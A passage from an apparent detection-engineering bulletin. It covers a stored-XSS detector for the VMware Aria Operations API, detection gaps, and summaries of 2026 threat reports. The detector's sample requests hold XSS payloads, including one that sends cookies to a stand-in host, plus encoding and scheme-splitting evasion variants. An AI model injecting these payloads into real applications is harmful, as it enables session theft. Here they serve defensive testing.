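     "body": '{"name":"CPU baseline","description":"Ready time on ESXi hosts > 5% for 10 min"}'},
    {"method": "POST", "path": "/suite-api/api/policy",              # plain payload
     "body": '{"name":"<script>fetch(\'https://203.0.113.7/?c=\'+document.cookie)</script>"}'},
    {"method": "PUT", "path": "/suite-api/api/alertdefinitions",    # double URL-encoded
     "body": '{"description":"%253CsCrIpT%253Ealert(1)%253C/script%253E"}'},
    {"method": "POST", "path": "/suite-api/api/policy",              # HTML entities
     "body": '{"name":"&#60;img src=x onerror=alert(1)&#62;"}'},
    {"method": "PATCH", "path": "/suite-api/api/policy",             # tab inside the scheme
     "body": '{"links":[{"url":"java\\tscript:alert(document.domain)"}]}'},
    {"method": "GET", "path": "/suite-api/api/policy?q=<script>",    # reads are out of scope
     "body": ""},
]

if __name__ == "__main__":
    for req, flagged in zip(SAMPLE_REQUESTS, scan_all(SAMPLE_REQUESTS)):
        print(flagged, req["method"], req["path"], scan_request(req)[:1])
```

Scoping to write methods on the API prefix keeps the rule on the stored-XSS path (payloads that land in a benchmark and run later in an admin's session) rather than alerting on every reflected `<script>` in a query string. The handler list is deliberately explicit; a bare `on[a-z]+=` pattern matches too much ordinary configuration text.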
Log Sources
- VMware Aria Operations audit log (/data/vcops/log/analytics/)
- vCenter Server audit log
- EDR (if agent deployed on Aria Ops VM)
- Web application firewall (API gateway logs)
- syslog/journald on Aria Ops appliance
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ❌ Gap — No VMware Aria Operations-specific detection rules |
| Splunk ESCU | ❌ Gap |
| Elastic | ❌ Gap |
| KQL | ❌ Gap |
Recommendation: VMware Aria Operations monitors your entire virtual infrastructure. Compromise gives attackers visibility into every monitored endpoint, VM performance data, and potentially stored credentials. Treat as critical infrastructure — patch immediately, apply KB430349 as interim for CVE-2026-22719.
Sources
- Broadcom Security Advisory VMSA-2026-0001 — Published February 24, 2026
- CyberPress — Multiple VMware Aria Vulnerabilities Enable RCE — Published February 24, 2026
5. IBM X-Force Threat Index 2026 + Sophos Active Adversary Report — Intelligence Summary
What’s New
Two major annual threat intelligence reports were published on February 24 and 25, 2026, with statistics that can inform detection program prioritization.
IBM X-Force Threat Intelligence Index 2026
Published: February 25, 2026
Key findings relevant to detection engineering:
| Stat | Figure | Detection Implication |
|---|---|---|
| Public-facing app exploitation | +44% YoY | Prioritize WAF/web server behavioral detections |
| ChatGPT credentials on dark web (2025) | 300,000+ | Infostealer detection critical; AI platform credentials = enterprise access path |
| Distinct ransomware/extortion groups | 109 groups (up from 73) | Signature-based ransomware detection insufficient; behavior needed |
| Supply chain incidents | 4× increase over 5 years | CI/CD, SaaS integration, and developer identity monitoring |
| Top targeted industry | Manufacturing | OT/ICS SOC teams should elevate priority |
| Ransomware ecosystem fragmentation | Top 10 groups’ dominance −25% | Expect unknown RaaS affiliates; don’t rely on IOC lists alone |
Source: IBM X-Force Threat Intelligence Index 2026 — Published February 25, 2026
Sophos Active Adversary Report 2026
Published: February 24, 2026
Key findings:
| Stat | Figure | Detection Implication |
|---|---|---|
| Identity-related incident root cause | 67% of all IR/MDR cases | MFA bypass, token theft, and Kerberoasting detections are highest ROI |
| Top ransomware groups | Akira (GOLD SAHARA), Qilin (GOLD FEATHER) | Ensure specific TTPs for both are covered |
| Threat groups observed | Record high | Attribution-independent behavioral detection more important than ever |
Key TTP focus for Akira/Qilin:
- Akira: ESXi locker, legitimate VPN abuse, double extortion
- Qilin: VMware ESXi targeting, BYOD exploitation, living-off-the-land techniques
Source: Sophos Active Adversary Report 2026 — Published February 24, 2026
Coverage Gap Summary
| Gap Area | Priority | Recommendation |
|---|---|---|
| FileZen web server command injection | HIGH | Create Sigma: web server spawning OS shell |
| Serv-U admin account creation | HIGH | Monitor SolarWinds Serv-U logs + Windows account creation events |
| Comebacker/Blindingcan backdoor | HIGH | Request IOCs from Symantec report; build YARA |
| VMware Aria Operations API abuse | MEDIUM | Instrument Aria Ops audit logs → SIEM |
| AI credential harvesting (ChatGPT/Copilot) | MEDIUM | Add AI platform credential stores to infostealer monitoring |
Sources verified with original publications. All threats confirmed published February 24–25, 2026.